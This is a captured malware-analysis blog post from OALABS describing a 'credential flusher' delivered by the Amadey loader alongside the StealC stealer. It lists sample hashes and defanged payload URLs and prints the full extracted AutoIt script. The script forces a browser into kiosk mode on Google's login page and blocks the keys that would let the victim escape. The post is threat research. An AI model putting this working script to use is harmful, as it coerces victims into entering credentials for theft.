research.openanalysis.net
Open in
urlscan Pro
185.199.109.153
Public Scan
URL:
https://research.openanalysis.net/credflusher/kiosk/stealer/stealc/amadey/autoit/2024/09/11/cred-flusher.html
Submission: On September 16 via api from TR — Scanned from IT
Submission: On September 16 via api from TR — Scanned from IT
Form analysis 0 forms found in the DOM
Text Content
OALABS Research
Tags
AUTOIT CREDENTIAL FLUSHER
Forcing users to enter credentials so they can be stolen
Sep 11, 2024 • 3 min read
credflusher kiosk stealer stealc amadey autoit
* Overview
* Samples
* Attack Analysis
* Deployment
* AutoIt Version
OVERVIEW
We have recently observed a new technique used by stealers to force victims into
entering credentials into a browser, allowing them to be stolen from the
browser's credential store using traditional stealer malware. This technique
dates back to at least August 22, 2024, and has been used in conjunction with
StealC malware. Intelligence from our partners at the Loader Insight Agency has
revealed that this technique is mainly deployed by Amadey when dropping StealC.
SAMPLES
The following samples provide an example of the technique implemented as an
AutoIt script, though a more comprehensive graph of samples is available via
UnpacMe PIVOT.
* b119eb3e182224d5399b12f7f106ffd27a0f12dd418a64aa23425000adbc44de UnpacMe
* 53aeb2fd2ee3a30d29afce4d852e4b33e96b0c473240691d6d63796caa3016f2 UnpacMe
* 78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078 UnpacMe
ATTACK ANALYSIS
The technique involves launching the victim's browser in kiosk mode and
navigating to the login page of the targeted service, usually Google. Kiosk mode
forces the browser into full-screen mode and prevents the victim from closing or
navigating away from the webpage. This tactic annoys the victim into entering
their credentials in an attempt to close the window. Once the credentials are
entered, they are stored in the browser's credential store on disk and can be
stolen using stealer malware, which is deployed along with the credential
flusher.
DEPLOYMENT
The credential flusher is not a credential stealer itself; it is simply used to
pressure the victim into entering their credentials, so it must be used in
conjunction with a stealer. Using intelligence provided by the Loader Insight
Agency, an example deployment is mapped below (see PIVOT for full details).
* First, the victim is infected with Amadey
0ec952da5d48ceb59202823d7549139eb024b55d93c2eaf98ca6fa99210b4608
* Amadey is then used to load StealC
99e3eaac03d77c6b24ebd5a17326ba051788d58f1f1d4aa6871310419a85d8af from
http[:]//31.41.244[.]11/steam/random.exe
* Amadey then loads the Credential Flusher
78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078 from
http[:]//31.41.244[.]11/well/random.exe
* The Credential Flusher then launches the browser in kiosk mode to force the
victim into entering their credentials, which can then be stolen by Stealc.
AUTOIT VERSION
The Credential Flusher is implemented as a simple AutoIt script that identifies
which browsers are available on the victim's host, then launches the preferred
browser in kiosk mode and navigates to the service targeted for credential
theft. In the example below, Google is the target:
https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password.
The AutoIt script is packaged into an AutoIt2Exe binary, for example,
78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078 UnpacMe.
UnpacMe has extracted the following credential flusher script.
LOCAL $PRIMARYBROWSER = ""
LOCAL $PRIMARYCLASS = ""
FUNC CLOSEBROWSER( $CLASS )
WHILE WINEXISTS ( $CLASS )
WINCLOSE ( $CLASS , "" )
SLEEP ( 0x000001f4 )
WEND
ENDFUNC
FUNC OPENBROWSER( $PRIMARYBROWSER , $PRIMARYCLASS )
LOCAL $URL = "https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password"
IF STRINGINSTR ( $PRIMARYBROWSER , "msedge.exe" ) THEN
RUN ( $PRIMARYBROWSER & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $URL )
ELSE
RUN ( $PRIMARYBROWSER & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $URL )
ENDIF
SLEEP ( 0x000007d0 )
LOCAL $HWND = WINGETHANDLE ( $PRIMARYCLASS )
WHILE 0x00000001
IF NOT WINEXISTS ( $HWND ) THEN
IF STRINGINSTR ( $PRIMARYBROWSER , "msedge.exe" ) THEN
RUN ( $PRIMARYBROWSER & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $URL )
ELSE
RUN ( $PRIMARYBROWSER & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $URL )
ENDIF
SLEEP ( 0x000007d0 )
$HWND = WINGETHANDLE ( $PRIMARYCLASS )
ENDIF
WINSETONTOP ( $HWND , "" , 0x00000001 )
IF NOT WINACTIVE ( $HWND ) THEN
WINACTIVATE ( $HWND )
ENDIF
SLEEP ( 0x000001f4 )
WEND
ENDFUNC
CLOSEBROWSER( "[CLASS:Chrome_WidgetWin_1]" )
CLOSEBROWSER( "[CLASS:MozillaWindowClass]" )
CLOSEBROWSER( "[CLASS:IEFrame]" )
IF FILEEXISTS ( "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" ) OR FILEEXISTS ( "C:\Program Files\Microsoft\Edge\Application\msedge.exe" ) THEN
$PRIMARYBROWSER = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$PRIMARYCLASS = "[CLASS:Chrome_WidgetWin_1]"
ELSEIF FILEEXISTS ( "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" ) OR FILEEXISTS ( "C:\Program Files\Google\Chrome\Application\chrome.exe" ) THEN
$PRIMARYBROWSER = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
$PRIMARYCLASS = "[CLASS:Chrome_WidgetWin_1]"
ELSEIF FILEEXISTS ( "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" ) OR FILEEXISTS ( "C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\brave.exe" ) THEN
$PRIMARYBROWSER = "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
$PRIMARYCLASS = "[CLASS:Chrome_WidgetWin_1]"
ELSE
EXIT
ENDIF
IF $PRIMARYBROWSER <> "" AND $PRIMARYCLASS <> "" THEN
OPENBROWSER( $PRIMARYBROWSER , $PRIMARYCLASS )
ENDIF
HOTKEYSET ( "{ESC}" , "IgnoreKey" )
HOTKEYSET ( "{F11}" , "IgnoreKey" )
FUNC IGNOREKEY( )
ENDFUNC
WHILE TRUE
SLEEP ( 0x00000064 )
WEND
Subscribe